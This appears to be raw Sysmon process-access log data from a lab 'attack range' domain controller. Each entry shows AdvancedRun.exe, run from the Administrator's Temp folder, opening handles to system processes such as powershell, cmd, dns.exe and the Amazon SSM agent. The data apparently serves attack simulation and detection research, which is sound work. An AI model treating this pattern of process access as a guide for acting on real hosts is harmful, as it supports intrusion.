20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program 
Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.213{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.212{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.211{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
